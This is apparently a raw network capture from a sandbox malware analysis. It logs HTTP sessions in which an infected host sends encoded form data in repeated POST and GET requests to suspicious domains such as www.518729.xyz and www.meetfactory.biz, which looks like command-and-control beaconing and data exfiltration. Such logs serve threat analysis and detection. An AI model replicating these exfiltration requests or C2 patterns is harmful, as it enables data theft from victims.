                                                Data Ascii: cayaqHEwizGM3F4A2m63aHfAf3cF8daZoPqQt5s3JXvTomK4mXomgzLm1DqtZ0xdVi+kTxvvHWrer5/iJt/ntLVebAKB6yParMRNzRS6Ut94fIoyEuNVLL7/Wb7igTqFp3YPBOPosLSziq8G+aFpJzE26bzbnL/XRxB9B8W/j73K33n96tkCfm3G/7dK8uvXywiT+VjUXbDYxxFHef9tcQaqQe9BwVsOHW9RaxpUOko82hTY2tY
                                                Aug 27, 2024 08:03:41.117100000 CEST778INHTTP/1.1 413 Request Entity Too Large
                                                server: openresty/1.13.6.1
                                                date: Tue, 27 Aug 2024 06:03:41 GMT
                                                content-type: text/html
                                                content-length: 607
                                                connection: close
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 31 33 20 52 65 71 75 65 73 74 20 45 6e 74 69 74 79 20 54 6f 6f 20 4c 61 72 67 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 31 33 20 52 65 71 75 65 73 74 20 45 6e 74 69 74 79 20 54 6f 6f 20 4c 61 72 67 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d [TRUNCATED]
                                                Data Ascii: <html><head><title>413 Request Entity Too Large</title></head><body bgcolor="white"><center><h1>413 Request Entity Too Large</h1></center><hr><center>openresty/1.13.6.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                Aug 27, 2024 08:03:41.248465061 CEST1289OUTData Raw: 76 36 2f 49 4e 37 38 4e 6e 44 54 44 53 31 52 4a 2f 44 54 51 4b 71 4f 48 69 63 65 53 44 49 64 44 59 58 6c 38 4a 57 44 31 48 76 4f 72 63 56 4c 68 35 73 56 59 37 70 6e 69 6d 2f 50 66 51 6e 38 53 71 6e 2b 75 51 72 4e 43 55 78 53 71 6e 36 32 64 35 48
                                                Data Ascii: v6/IN78NnDTDS1RJ/DTQKqOHiceSDIdDYXl8JWD1HvOrcVLh5sVY7pnim/PfQn8Sqn+uQrNCUxSqn62d5H05PVlHLwmOHGHOS0sjnij8P3t6R3u17IJPlIHo05Mwt6nP8CA8lKDiZA0gZhgdQwoj2qceIBYe9hbIa/L/HCVU5cGZ3bmCgdHeYUkDrtkgN1z17guseEvHfObJ0RrqkejDo56rXHHMAwzRK+eOrVP3Mc7jmsyPOgc
                                                Aug 27, 2024 08:03:41.248630047 CEST2578OUTData Raw: 6c 4b 4e 4f 63 46 59 34 7a 69 52 6c 45 58 56 31 49 4e 67 69 61 36 75 68 58 74 55 77 57 38 52 4f 39 68 69 36 78 52 34 41 4a 65 5a 30 59 55 79 4f 54 6e 53 2f 4a 56 53 76 46 30 69 45 6e 7a 66 71 65 58 74 63 31 6b 4c 6a 72 30 63 54 55 75 57 64 31 48
                                                Data Ascii: lKNOcFY4ziRlEXV1INgia6uhXtUwW8RO9hi6xR4AJeZ0YUyOTnS/JVSvF0iEnzfqeXtc1kLjr0cTUuWd1H7UUfUhF6sarMOgD7Qzz3a+Uogfp7XGaQImszMO7ZfiwLJjq8BrXCzMhYxzsQROoG7vJEs393CHy5WPjx9k0sdtwD8eF3v1QC6907FcceNS8QFBEXJBXMXOT+8Igy8xs7A2L4bB1fOEoOhYsEf3BF9NiPj/L8lY4ly
                                                Aug 27, 2024 08:03:41.248703957 CEST6445OUTData Raw: 78 41 30 78 68 54 6f 47 32 47 2b 71 71 56 64 44 4a 53 49 79 4e 54 7a 4b 2f 6c 6d 64 47 73 34 6e 70 73 53 79 4e 75 4e 5a 61 6d 42 56 51 55 55 67 5a 31 4c 7a 39 4a 33 4b 73 6a 4d 68 71 38 35 57 55 61 6a 73 65 2b 49 6b 2f 6c 64 6c 63 4b 4f 67 56 68
                                                Data Ascii: xA0xhToG2G+qqVdDJSIyNTzK/lmdGs4npsSyNuNZamBVQUUgZ1Lz9J3KsjMhq85WUajse+Ik/ldlcKOgVhvdwu4hW2yDssLeK2QbjI42mgBa10tG8xpoo82P6ysU51puswDSc1ashcOO6mWF2B+n1/oXSIQ9n7d26PCExZM3ZW06CBViYvncpEGpaYT/XpDe+3kZedulPgojax/KYUgFtn0ccacHveND4nRnab7IM2RqeqUlg/q
                                                Aug 27, 2024 08:03:41.248868942 CEST2578OUTData Raw: 6c 46 5a 61 37 72 51 70 76 79 76 50 66 64 78 50 54 44 55 4b 71 33 30 6a 38 69 75 44 67 46 61 34 58 43 34 4c 39 71 38 6d 72 38 68 4d 54 72 31 71 44 51 7a 69 56 72 4a 61 42 39 71 42 71 62 35 2f 63 44 4a 62 56 30 47 39 37 36 50 67 33 6a 66 49 4b 67
                                                Data Ascii: lFZa7rQpvyvPfdxPTDUKq30j8iuDgFa4XC4L9q8mr8hMTr1qDQziVrJaB9qBqb5/cDJbV0G976Pg3jfIKgNlA4Q+PJtz+0CHWx+fxN78sQku8QAGktZh/ob5ttCV73La2yCO5n8DdgqPGU0iYljfodOfsER2x43fUR3ZHElBH9TMTsiqAfpXeuHm9bibFscYkJEbRWR86bVdiI6446YLucEEGWFQ+JZ171fLc8QZyXIgvUgyUTy


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                61192.168.11.204990396.126.123.24480
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:03:43.647979975 CEST549OUTGET /o0e7/?ij60MtY=xHuhihA5a0RCQDr7UqpawT1cYL9BOqgbdgZ3/38wD7lrSrU6llHUt19Sg65W4AIkiHRz640OtFHlOrepbmqCRMN0Rn3a8HvHNm6R1WOOyMUaxc5SdqEBk4o=&wXB=brv4Erb HTTP/1.1
                                                Host: www.meetfactory.biz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:03:43.782824039 CEST1289INHTTP/1.1 200 OK
                                                server: openresty/1.13.6.1
                                                date: Tue, 27 Aug 2024 06:03:43 GMT
                                                content-type: text/html
                                                transfer-encoding: chunked
                                                connection: close
                                                Data Raw: 34 39 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 37 30 2e 6d 65 65 74 66 61 63 [TRUNCATED]
                                                Data Ascii: 498<!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <noscript> <meta http-equiv="refresh" content="0;url=http://www70.meetfactory.biz/" /> </noscript> <meta http-equiv="refresh" content="5;url=http://www70.meetfactory.biz/" /> </head> <body onload="do_onload()"> <script type="text/javascript"> function do_onload() { window.top.location.href = "http://www.meetfactory.biz/o0e7?gp=1&js=1&uuid=1724738623.0026592825&other_args=eyJ1cmkiOiAiL28wZTciLCAiYXJncyI6ICJpajYwTXRZPXhIdWhpaEE1YTBSQ1FEcjdVcXBhd1QxY1lMOUJPcWdiZGdaMy8zOHdEN2xyU3JVNmxsSFV0MTlTZzY1VzRBSWtpSFJ6NjQwT3RGSGxPcmVwYm1xQ1JNTjBSbjNhOEh2SE5tNlIxV09PeU1VYXhjNVNkcUVCazRvPSZ3WEI9YnJ2NEVyYiIsICJyZWZlcmVyIjogIiIsICJhY2NlcHQiOiAidGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhd [TRUNCATED]
                                                Aug 27, 2024 08:03:43.782836914 CEST55INData Raw: 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: } </script> </body></html>0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                62192.168.11.204990423.231.158.380
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:03:49.107882023 CEST808OUTPOST /s1mg/ HTTP/1.1
                                                Host: www.518729.xyz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.518729.xyz
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 204
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.518729.xyz/s1mg/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 37 53 39 43 74 55 65 43 54 76 7a 71 6c 46 4a 47 38 6e 5a 72 48 4f 54 72 33 2b 47 76 34 58 6a 6a 73 45 42 4d 79 58 57 4a 32 5a 7a 63 4a 67 66 71 63 4f 67 37 4b 76 41 6c 79 4e 4d 47 39 79 4c 74 56 7a 6c 64 65 45 6c 53 56 4f 31 64 42 55 51 31 41 62 52 30 57 4a 62 31 61 74 6d 44 6a 6c 51 43 4c 69 4d 6f 70 31 52 6e 36 77 50 71 64 42 36 31 56 76 4e 52 42 4b 78 7a 44 75 4f 4a 52 35 43 62 31 50 6a 75 47 53 48 6f 6b 66 68 71 63 49 51 67 54 50 45 49 58 63 61 56 4e 4a 30 63 56 76 73 74 43 4c 4e 49 50 48 4a 42 57 76 69 6c 44 53 70 4b 5a 4c 4f 61 2f 6d 4d 31 64 67 68 54 76 6a 4a 31 6f 67 3d 3d
                                                Data Ascii: ij60MtY=7S9CtUeCTvzqlFJG8nZrHOTr3+Gv4XjjsEBMyXWJ2ZzcJgfqcOg7KvAlyNMG9yLtVzldeElSVO1dBUQ1AbR0WJb1atmDjlQCLiMop1Rn6wPqdB61VvNRBKxzDuOJR5Cb1PjuGSHokfhqcIQgTPEIXcaVNJ0cVvstCLNIPHJBWvilDSpKZLOa/mM1dghTvjJ1og==


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                63192.168.11.204990523.231.158.380
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:03:51.942110062 CEST1148OUTPOST /s1mg/ HTTP/1.1
                                                Host: www.518729.xyz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.518729.xyz
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 544
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.518729.xyz/s1mg/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 37 53 39 43 74 55 65 43 54 76 7a 71 6b 67 42 47 2b 47 5a 72 46 75 54 71 30 2b 47 76 78 33 6a 6e 73 45 64 4d 79 53 75 6a 32 4d 62 63 4a 41 76 71 64 50 67 37 4e 76 41 6c 36 74 4d 44 35 79 4c 6d 56 7a 70 72 65 46 5a 53 56 4f 68 64 41 6e 59 31 52 62 52 37 64 70 62 32 4d 64 6d 34 6e 6c 51 79 4c 69 78 44 70 30 31 6e 36 68 6a 71 63 48 6d 31 52 2b 4e 53 57 71 78 31 55 65 4f 4b 59 5a 43 56 31 50 2b 52 47 54 4f 54 6c 71 70 71 63 72 49 67 53 50 45 4a 64 73 61 53 41 70 31 65 62 2b 56 37 4f 76 78 59 66 32 70 79 55 4f 6d 6a 42 42 31 6e 58 36 47 45 6d 31 59 37 46 78 4e 46 35 43 67 6d 30 53 63 45 4d 34 59 47 50 39 53 2f 68 4d 71 49 4e 4b 71 36 61 70 4f 4f 33 63 36 54 4e 4d 4b 65 68 49 39 32 69 74 75 78 4f 51 4e 4c 70 66 6e 79 47 6f 43 46 73 6a 4e 31 41 67 68 2f 69 4a 4d 37 65 4a 2f 5a 77 77 72 65 63 64 72 58 2b 41 41 64 6e 54 77 4a 52 4a 53 4a 4d 64 38 75 33 6b 72 73 63 64 73 4b 52 6f 52 75 32 74 6c 6b 4d 74 2b 4c 65 63 76 6b 4f 35 54 45 76 49 31 44 71 6e 4f 4a 73 31 41 64 2b 36 4c 73 64 76 [TRUNCATED]
                                                Data Ascii: ij60MtY=7S9CtUeCTvzqkgBG+GZrFuTq0+Gvx3jnsEdMySuj2MbcJAvqdPg7NvAl6tMD5yLmVzpreFZSVOhdAnY1RbR7dpb2Mdm4nlQyLixDp01n6hjqcHm1R+NSWqx1UeOKYZCV1P+RGTOTlqpqcrIgSPEJdsaSAp1eb+V7OvxYf2pyUOmjBB1nX6GEm1Y7FxNF5Cgm0ScEM4YGP9S/hMqINKq6apOO3c6TNMKehI92ituxOQNLpfnyGoCFsjN1Agh/iJM7eJ/ZwwrecdrX+AAdnTwJRJSJMd8u3krscdsKRoRu2tlkMt+LecvkO5TEvI1DqnOJs1Ad+6LsdvI1Ry5sEuI/Kfi3AnuxNGkMsA4yMqdl/QjThh+M3A/dU/HVrtDlBbHBZyS+WSIJagEUH/N5zKxosmFeY9i1wPWaAD09XKL2g9zL4BuGY0PklUjL9i7Hkeco+vY8xwEEVbm+pD1ZDNtZJ7cDr9e+glV1qb6ch7xPMrDYUvs7IE3tQC96Xuph3/4DApL5nofFi6ZuU6ORQw9a8hc=


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                64192.168.11.204990623.231.158.380
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:03:54.797867060 CEST2578OUTPOST /s1mg/ HTTP/1.1
                                                Host: www.518729.xyz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.518729.xyz
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 52932
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.518729.xyz/s1mg/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 37 53 39 43 74 55 65 43 54 76 7a 71 6b 67 42 47 2b 47 5a 72 46 75 54 71 30 2b 47 76 78 33 6a 6e 73 45 64 4d 79 53 75 6a 32 4d 44 63 49 7a 6e 71 63 73 34 37 4d 76 41 6c 77 4e 4d 43 35 79 4c 33 56 7a 42 33 65 46 55 74 56 4d 5a 64 41 30 67 31 52 4f 46 37 59 70 62 33 53 4e 6d 41 6a 6c 51 59 4c 69 4e 58 70 30 51 61 36 77 6e 71 64 41 4b 31 56 4e 56 52 4d 61 78 7a 55 65 4f 47 63 5a 44 6f 31 50 72 4d 47 54 43 54 6c 75 56 71 64 5a 41 67 55 59 51 4a 65 4d 61 52 4c 4a 31 72 55 65 56 4b 4f 75 52 71 66 32 70 45 55 50 53 6a 42 43 74 6e 57 39 36 44 6d 56 59 37 61 42 4e 45 72 79 63 69 30 53 6f 63 4d 34 38 47 50 36 75 2f 69 73 71 49 49 70 79 35 64 4a 4f 41 7a 63 36 2b 66 38 57 57 68 4d 56 45 69 73 4b 78 4f 42 70 4c 6f 73 2f 79 44 4b 71 46 6d 6a 4e 7a 64 51 68 73 34 35 4d 52 65 4a 50 2f 77 78 4c 6b 63 64 66 58 6b 6b 55 64 69 32 51 4f 59 4a 53 31 41 39 38 37 38 45 6e 65 63 63 42 52 52 6f 52 2b 32 70 64 6b 4d 64 4f 4c 64 59 37 6c 4f 70 54 66 70 49 31 73 7a 32 79 66 73 7a 6c 51 2b 35 62 47 64 6f [TRUNCATED]
                                                Data Ascii: ij60MtY=7S9CtUeCTvzqkgBG+GZrFuTq0+Gvx3jnsEdMySuj2MDcIznqcs47MvAlwNMC5yL3VzB3eFUtVMZdA0g1ROF7Ypb3SNmAjlQYLiNXp0Qa6wnqdAK1VNVRMaxzUeOGcZDo1PrMGTCTluVqdZAgUYQJeMaRLJ1rUeVKOuRqf2pEUPSjBCtnW96DmVY7aBNEryci0SocM48GP6u/isqIIpy5dJOAzc6+f8WWhMVEisKxOBpLos/yDKqFmjNzdQhs45MReJP/wxLkcdfXkkUdi2QOYJS1A9878EneccBRRoR+2pdkMdOLdY7lOpTfpI1sz2yfszlQ+5bGdo41QS5sBNw8Cvi6fXunJGkbsAEUMrZ1/hfTgRuM1g/eEPHJgNDnFbHBZyWAWSUJa1wUBNF5ws5oqmFEY9iewPa5AD8TXL7Ig+fL4weGMVPl10jK3C7cgeQz+rw0xz95Ws++oDlZIttWMbcI9tf7klZpqbmqh71fMoDYFYIlbVXmLjMtSKtB1PwkF+L3jZTPksNWWMyvBBdmqnqA13/f8mZcq0I6m72uUmj4tSncpO6cOnQ61N8T0LX7CUH6wfQekqIps6swMhFgzsUrn7YhRHTaZNhV6yR1yUsWzBDT7fKMFdJQl5sZmyMPJwCtnjRS24LjJwpOgZA/VehYBCqH1NI4t/IknGlRZsap9mDxAHnQUkK3QQEkaOUqHcmNxeAi8R0cmZz4sUr9C7QLDWU+qbBpUFW4oCqp8yEuXy3+7lSNsAGYEtLJqQiDaA6YZ3x2MA0vulOw1qLkmWOVQIlVUJ57Uzy6DAA6T6rpAqFtRLR3mZdmF0I/oaAA36eQRq+0EYY03bhVOnCmLM0p/IfosivljJYTlyGYAYZgU0rj6s3q6300XGlTd3oybrhB9W5vREwrVPMdTHLFGeGKe0s55/B5wD9QWG+mhsgL5gctQr5Qt8D2BkTviYCSjHom+rylG61LhFgG+vPjmTOHh3WOpk924y1BR5GVlFIw [TRUNCATED]
                                                Aug 27, 2024 08:03:54.797938108 CEST9023OUTData Raw: 73 74 4c 56 47 66 64 7a 39 71 51 42 34 57 52 50 4d 4c 53 31 67 51 7a 6f 2b 76 71 4a 61 33 79 5a 47 41 4a 79 51 4d 38 61 41 35 71 37 6f 6e 4f 4c 66 5a 39 68 5a 31 33 34 64 6c 56 5a 38 51 74 74 34 4b 50 61 35 48 62 39 76 53 54 4a 59 54 32 53 4e 77
                                                Data Ascii: stLVGfdz9qQB4WRPMLS1gQzo+vqJa3yZGAJyQM8aA5q7onOLfZ9hZ134dlVZ8Qtt4KPa5Hb9vSTJYT2SNw9zqKrDZVmqeDBIlP/5NCNvu1TcMtRwFnfS9v7jeOwPIncmI1+OVskhslMGPKo/DxfPmzVt6KEmrxqMpwq9pBQxBYc3upVTHZUqGOLCVx7eiveNMwNeP9denVrmrojweBKBTtIO/QWNiP180yEXy9tMd9q9QKeByCC
                                                Aug 27, 2024 08:03:54.797962904 CEST1289OUTData Raw: 4f 4f 6a 33 6f 66 36 49 71 47 6a 67 6c 67 35 31 48 70 4e 6e 66 44 4b 30 5a 42 4b 79 4f 73 38 76 56 68 65 77 63 79 2b 50 2f 73 37 67 68 56 4a 73 68 54 47 4c 31 6e 36 57 45 4b 58 41 4a 37 52 6a 70 73 42 47 71 57 4e 71 49 47 4a 7a 4c 49 67 4d 75 7a
                                                Data Ascii: OOj3of6IqGjglg51HpNnfDK0ZBKyOs8vVhewcy+P/s7ghVJshTGL1n6WEKXAJ7RjpsBGqWNqIGJzLIgMuzKqFJY8p4u6zqfcxtn5crLej+yxI1yYLzA5ZEfntePm1Qv3EFw01esgoWy31WBcNDEYPFVqaKkxpW1K5kkI+8MVfvi0LyxJJrfENEINv3rA4NnVYfO1umK9f3tPd5zkngwXCek0+Ho5waPlgU6B6OZpUWiOfi4yx0A
                                                Aug 27, 2024 08:03:55.113825083 CEST2578OUTData Raw: 67 48 76 5a 56 4c 70 4d 36 42 7a 70 65 6c 48 77 35 73 47 43 6a 55 58 68 47 75 36 6a 72 6c 43 63 33 32 51 50 45 65 2f 37 72 51 78 35 62 48 52 56 70 55 4a 75 39 5a 69 4e 63 33 5a 46 36 6e 6b 4c 54 59 30 42 48 70 56 7a 4d 31 74 36 59 52 4a 77 4e 6e
                                                Data Ascii: gHvZVLpM6BzpelHw5sGCjUXhGu6jrlCc32QPEe/7rQx5bHRVpUJu9ZiNc3ZF6nkLTY0BHpVzM1t6YRJwNnNYe3ZWc2Q9x8GrriRFuz1oEPOHcorgJs/mg8eQvBqFnaAcixvAFtpHR3DfcyUvG5q7TEyehVGIeLLZuwoHiN7mGn60DeNSUeE6Zd1YRLxsmrCEZDcBRd7ZXcReOdNEehHWdK3C8IX5lYbLPBFgdkWIngbUCd8F8z1
                                                Aug 27, 2024 08:03:55.113998890 CEST5156OUTData Raw: 57 39 35 76 62 51 77 77 5a 70 38 31 77 70 67 73 4d 68 54 53 2b 54 4d 56 77 30 68 64 56 62 6b 67 79 50 57 45 43 4d 47 76 6c 35 42 73 6b 57 66 79 76 53 67 2b 6f 34 46 47 2f 4a 72 79 4c 6a 6f 49 62 66 42 73 39 68 33 35 2f 35 37 43 4f 37 59 6e 72 73
                                                Data Ascii: W95vbQwwZp81wpgsMhTS+TMVw0hdVbkgyPWECMGvl5BskWfyvSg+o4FG/JryLjoIbfBs9h35/57CO7Ynrs2dnrC+K+aYFgmVsEk50RFz2SSgcPCZZkeOt/uFOoOmlNKFdhh/MZ2Vw5LpeRxXk5LwFPCEV8rICOlzjWSKs0LoK0J6e9fZFB+Adbp7GqIVdQnLDvUgLgWs7m5gOc78HTETufKM80hxlXsnj/Tw7DGXI2Ct+XR67ew
                                                Aug 27, 2024 08:03:55.114346027 CEST15468OUTData Raw: 67 49 6e 6f 4d 4f 6f 46 4c 47 53 6e 4a 31 50 66 56 42 4c 70 76 57 39 42 53 5a 78 61 4c 4c 50 59 73 58 2b 50 31 61 48 47 2b 57 35 78 6e 73 78 38 4f 52 69 34 4b 73 45 31 38 4c 33 57 30 57 50 53 32 71 78 55 49 51 33 5a 53 55 42 38 39 4f 5a 49 7a 77
                                                Data Ascii: gInoMOoFLGSnJ1PfVBLpvW9BSZxaLLPYsX+P1aHG+W5xnsx8ORi4KsE18L3W0WPS2qxUIQ3ZSUB89OZIzwyusJXr1ehlrhV/ZeujuPMyPXd/lN+zFv5KgHET0FE7eQjnYGpWI1KG795CqjmgimE8aHW0Mb7aiC2C9YMatYFxMofbkmcrIbKFXAcLOUqr/A0mEW9D733CVQMzNzHgLH1g3onANlVXf/q/8mdbh6TWiC7wxd+85z5
                                                Aug 27, 2024 08:03:55.114515066 CEST1289OUTData Raw: 43 77 79 73 78 65 6a 6f 2b 59 74 67 33 50 68 2f 44 62 33 52 59 48 56 4b 37 6c 59 4e 66 31 41 39 69 59 70 59 77 51 5a 47 79 4e 39 4f 72 7a 4f 52 68 2f 32 44 38 54 47 42 71 6b 2b 65 49 43 50 65 64 31 6c 32 59 66 58 61 76 42 78 58 4e 4d 57 4a 67 63
                                                Data Ascii: Cwysxejo+Ytg3Ph/Db3RYHVK7lYNf1A9iYpYwQZGyN9OrzORh/2D8TGBqk+eICPed1l2YfXavBxXNMWJgcr/b2z6NvIHuPPVft5k08pwRXw1cx/iBbHJADm9EdZFoC3/DkXJWr3q4Z2HwKo8NTJIITHXijeHk5X2Rc/T7v4fgmeqcxhLEYuJateyws94nWfdEfj4ufXqaIAqkDSxtcvwl/4Afu58PxQ2WUK8Cx3H+xBAZyL9Aar
                                                Aug 27, 2024 08:03:55.114631891 CEST1289OUTData Raw: 74 33 4a 65 31 39 6f 71 46 69 2f 2b 6e 49 41 56 78 63 4a 72 47 6d 44 68 2f 4b 53 46 45 52 71 49 4d 50 62 4a 71 79 50 4e 44 6e 63 5a 32 39 31 52 4b 47 46 74 30 75 4c 6c 65 71 46 53 49 66 59 59 7a 70 38 2f 6f 46 70 4c 4d 55 49 66 70 73 4d 36 68 47
                                                Data Ascii: t3Je19oqFi/+nIAVxcJrGmDh/KSFERqIMPbJqyPNDncZ291RKGFt0uLleqFSIfYYzp8/oFpLMUIfpsM6hGhnWMVa7rbL7KXeDMvGZCtI1Wuo0mYK9s3z16aOCoJYPNKy9wdsAdd4InKLE5OB5hdu5M8TpovnK2RDf2bG1EHzY/6Zmg71tNl94jynaYgtijAwiOWiQAQSTe11IxkZDPCvndXGIN3TQJivJbMdBjx/WccSVhevZG5


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                65192.168.11.204990723.231.158.380
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:03:57.626565933 CEST544OUTGET /s1mg/?ij60MtY=2QViuhW/NYaw5nxi+F1oVZq46szrrR71oUxOni/Qn+PFEj/1SakqFOMu9uwTuSiQaklPQGQrKMR1DX8jJ/FrQ8LNcsmQ9XMkBTdB/FoVvRnsRxC4QNxtOLg=&wXB=brv4Erb HTTP/1.1
                                                Host: www.518729.xyz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                66192.168.11.2049908172.67.191.24180
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:04:03.143290997 CEST835OUTPOST /fp5q/ HTTP/1.1
                                                Host: www.cachsoicautdtc.best
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.cachsoicautdtc.best
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 204
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.cachsoicautdtc.best/fp5q/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
